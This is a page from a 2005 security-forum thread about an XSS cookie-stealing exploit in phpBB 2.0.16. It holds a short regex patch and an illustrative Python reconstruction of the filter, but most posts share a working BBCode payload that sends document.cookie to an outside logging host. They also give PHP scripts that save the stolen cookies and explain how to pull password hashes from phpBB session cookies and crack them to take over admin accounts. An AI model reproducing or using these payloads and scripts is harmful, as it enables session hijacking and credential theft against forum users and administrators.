Waraxe IT Security Portal  
www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
PostPosted: Sun Jul 10, 2005 5:57 pm Reply with quote
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

WaterBird wrote:
Btw, any idea how to fix this hole? phpBB doesn't know about it yet?


Ok, look at "includes/bbcode.php", function "bbencode_second_pass()":

Code:

   // matches a [url]xxxx://www.phpbb.com[/url] code..
   $patterns[] = "#\[url\]([\w]+?://[^ \"\n\r\t<]*?)\[/url\]#is";
   $replacements[] = $bbcode_tpl['url1'];

   // [url]www.phpbb.com[/url] code.. (no xxxx:// prefix).
   $patterns[] = "#\[url\]((www|ftp)\.[^ \"\n\r\t<]*?)\[/url\]#is";
   $replacements[] = $bbcode_tpl['url2'];

   // [url=xxxx://www.phpbb.com]phpBB[/url] code..
   $patterns[] = "#\[url=([\w]+?://[^ \"\n\r\t<]*?)\]([^?\n\r\t].*?)\[/url\]#is";
   $replacements[] = $bbcode_tpl['url3'];

   // [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
   $patterns[] = "#\[url=((www|ftp)\.[^ \"\n\r\t<]*?)\]([^?\n\r\t].*?)\[/url\]#is";
   $replacements[] = $bbcode_tpl['url4'];



Now, you must improve those regexes, like:

Code:

[^ \"\n\r\t<]


Add there some more "dangerous" chars, like :

Code:

[^ \"\n\r\t\'\`\[\]<]


This is a primitive and temporary patch, but it seems to work right now.
When the phpBB developers release their own patch, I suggest using that one.
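As an added illustration (not code from this thread or from phpBB itself), here is a Python reconstruction of the two no-prefix [url] rules quoted above, run once with the original character class and once with the hardened one. The anchor templates are stand-ins, since the thread does not show $bbcode_tpl['url2'] or ['url4']; the (www|ftp) group is made non-capturing, so the description is group 2 rather than 3; and the nested sample post is constructed with harmless placeholders. The needs_review() helper is an assumed moderation check: it flags any post where the two filters disagree, which is exactly the case where the original class would have let a quote, backtick or bracket into the href attribute.

```python
import re

# Character class from phpBB 2.0.16's [url] regexes, as quoted in the thread, and the
# hardened class proposed above, which additionally rejects ' ` [ and ].
ORIGINAL_CLASS = r'[^ "\n\r\t<]'
HARDENED_CLASS = r"[^ \"\n\r\t'`\[\]<]"

# Stand-in anchor templates (assumption: the thread does not show $bbcode_tpl).
# They only need to embed the captured URL inside a double-quoted attribute.
URL2_TPL = r'<a href="http://\1" target="_blank">\1</a>'
URL4_TPL = r'<a href="http://\1" target="_blank">\2</a>'


def build_patterns(char_class):
    """Python equivalents of phpBB's url2 and url4 patterns (the no-xxxx:// forms).

    (www|ftp) is non-capturing here, so the link description is group 2.
    re.I | re.S mirrors the PCRE 'is' modifiers on the original patterns."""
    url2 = re.compile(r'\[url\]((?:www|ftp)\.' + char_class + r'*?)\[/url\]', re.I | re.S)
    url4 = re.compile(r'\[url=((?:www|ftp)\.' + char_class + r'*?)\]([^?\n\r\t].*?)\[/url\]',
                      re.I | re.S)
    return url2, url4


def render(text, char_class):
    """Apply url2 and then url4, in the order phpBB's preg_replace() arrays use.

    url4 runs over the HTML that url2 already produced, so whatever url2 left inside
    the href attribute is scanned again; that re-scan is what the nesting trick relies on."""
    url2, url4 = build_patterns(char_class)
    text = url2.sub(URL2_TPL, text)
    return url4.sub(URL4_TPL, text)


def needs_review(text):
    """Moderation check (assumed helper): True when the original and hardened filters
    disagree, i.e. the original would have passed a ' ` [ or ] into an attribute value."""
    return render(text, ORIGINAL_CLASS) != render(text, HARDENED_CLASS)


# Constructed inputs (not from the thread): one ordinary link and one nested form that
# mimics the thread's structure with harmless placeholder values.
BENIGN = '[url]www.example.com[/url]'
NESTED = "[url]www.example.com[url=www.example.org'style='color:red]x[/url][/url]"

if __name__ == '__main__':
    for sample in (BENIGN, NESTED):
        print('original :', render(sample, ORIGINAL_CLASS))
        print('hardened :', render(sample, HARDENED_CLASS))
        print('flag     :', needs_review(sample), '\n')
```

With the original class the nested sample renders to an anchor whose href contains a second `<a href="`, so the quote that closes that inner `href` ends the outer attribute early and the single-quoted fragments after it are parsed as new attributes; with the hardened class neither rule matches and the post is left as plain text, while the ordinary link renders identically under both.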
PostPosted: Sun Jul 10, 2005 6:19 pm Reply with quote
WaterBird
Active user
Joined: May 16, 2005
Posts: 37

Thank You :}
cookie to pass
PostPosted: Sun Jul 10, 2005 8:22 pm Reply with quote
mimdrj
Beginner
Joined: Jul 10, 2005
Posts: 1

I got cookies but I really don't know how to get pass from cookies, please help, it is too important for me, thanks
PostPosted: Sun Jul 10, 2005 8:52 pm Reply with quote
diaga
Regular user
Joined: Jun 27, 2005
Posts: 22

works fine for me =]

By using a short domain (I'm using 3 char), you could even fit it into a signature =]
PostPosted: Sun Jul 10, 2005 10:12 pm Reply with quote
g30rg3_x
Active user
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE

Just a few hours and the post gets 33 posts.

Yeah, I have to re-read all the posts, and I'll answer some questions that I see have not been correctly answered...

Another bbcode flaw in combination with social engineering, I think *_^

Yeah, it requires social engineering for grabbing the most valuable cookie,
which is the admin cookie.

Sorry, but I don't understand what you mean by "only works on IE".

Yeah, I know it's too late, but this PoC only executes on IE,
and excellent short video...

By the way, g30rg3_x, did you manage to use this exploit?

Nope, I just remind you all that this exploit is not officially patched, but our webmaster has launched an unofficial but working patch.

Cookie stealer code...
Mmm, I use this:
Code:

<?php
$cookie = $_GET['cookie'];
$fff = fopen("cookie.txt","a+");
fwrite($fff, "$cookie \n");
fclose($fff);
?>


jpg/txt/gif cookie stealer...

This doesn't exist; they use a .txt or .jpg or .bmp or whatever, why???
It is simple: if you use .php, it will execute on your server side, so if you use .txt or whatever, this "bad cookie stealer code" would be injected in the website and not included; that's the real thing that happens, and that's why .xxx extensions are used.

I got cookies but I really don't know how to get pass from cookies, please help, it is too important for me, thanks

As you see, you would get something like:
Code:

phpbb2mysql_t=a:2:{i:1;i:1121004937;i:2;i:1121005196;};
phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";i:666;}; phpbb2mysql_sid=b57ae9f7898f1ccebf7e07fa427e5998


The part you need is:
phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";i:666;};

Every piece of information has a role, like the
c2150783216c11afea291d179e7b1902
is the hash of the password of the user whose cookie you stole...

"userid";i:666;
you can view this as:
userid: 666

So now you will surely ask, and which user is this? Simply see his profile
http://www.theexploitedsite.com/forum/profile.php?mode=viewprofile&u=x

where the value x of u is the userid, so in this case:
http://www.theexploitedsite.com/forum/profile.php?mode=viewprofile&u=666
and now you will see which user it is.

Sorry for the late answers, but this topic moves so fast.

Regards

Last edited by g30rg3_x on Mon Jul 11, 2005 7:03 pm; edited 2 times in total
PostPosted: Mon Jul 11, 2005 6:27 pm Reply with quote
KingOfSka
Advanced user
Joined: Mar 13, 2005
Posts: 61

I tested locally and in some test forum, and the exploit is working (I used my own cookie stealer file), but I used mod_rewrite to have a .png file processed as PHP. The only problem is that it seems to work only in the body part of a post, and not in a PM...
PostPosted: Mon Jul 11, 2005 7:56 pm Reply with quote
700G
Active user
Joined: Mar 25, 2005
Posts: 33

I haven't tried it in a PM yet, but it definitely works as a signature too.
PostPosted: Tue Jul 12, 2005 9:44 am Reply with quote
KingOfSka
Advanced user
Joined: Mar 13, 2005
Posts: 61

verbatim wrote:

Any ideas? Is there a mistake here:
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookie.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Finally, did you manage to use this exploit with a personal stealer script?

(I know, a lot of questions, but I guess it may help other readers)

Yes, there's an error: it should be /cookie.php?var='+document.cookie , where var is the name of the variable that should store the cookie.
PostPosted: Wed Jul 13, 2005 3:11 am Reply with quote
theOne
Regular user
Joined: May 31, 2005
Posts: 8

How would you go about doing it like they're doing at antichat? Using jpg and still getting info?
PostPosted: Wed Jul 13, 2005 5:55 am Reply with quote
700G
Active user
Joined: Mar 25, 2005
Posts: 33

Here is what exactly is working for me:

Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://site.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


and i am using this script:

Code:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>


Working very well. I have a long list of cracked MD5s using Cain and rainbow tables.
PostPosted: Wed Jul 13, 2005 11:54 am Reply with quote
_daemon_
Beginner
Joined: Jul 13, 2005
Posts: 4
Location: Greece

Hey there, that's great info! Congrats. I'd like to ask a question: why can't this work on Firefox? It's OK with IE, but many people use FF, Opera, etc. nowadays. Thanks a bunch
PostPosted: Wed Jul 13, 2005 12:42 pm Reply with quote
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

_daemon_ wrote:
Hey there, that's great info! Congrats. I'd like to ask a question: why can't this work on Firefox? It's OK with IE, but many people use FF, Opera, etc. nowadays. Thanks a bunch


Maybe because IE is less restrictive on some rules, like the use of the various quotes. I mean, Firefox will not accept the " ` " character as a substitute for the single or double quote.
PostPosted: Wed Jul 13, 2005 9:35 pm Reply with quote
g30rg3_x
Active user
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE

The original advisory in Russian
( http://antichat.ru/txt/phpbb/ )

says that this exploit works because IE treats ` as the equivalent of ", so that's why it executes only in IE and not with other engines..
Quote:

....
Pay attention to the symbol `. It is not ', but in this case Internet Explorer perceives it as its equivalent. Here is the result:


Regards
PostPosted: Thu Jul 14, 2005 12:09 am Reply with quote
Slobo
Beginner
Joined: Jul 14, 2005
Posts: 2

What if the admin control panel is password protected? How should the cookie be edited to log in automatically to the admin area?
PostPosted: Thu Jul 14, 2005 8:06 am Reply with quote
KingOfSka
Advanced user
Joined: Mar 13, 2005
Posts: 61

Sometimes you simply can't; there are some mods that require the admin to insert his password to log in to the admin panel, regardless of cookies, so you have to crack it.
All times are GMT  
Page 3 of 8  
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"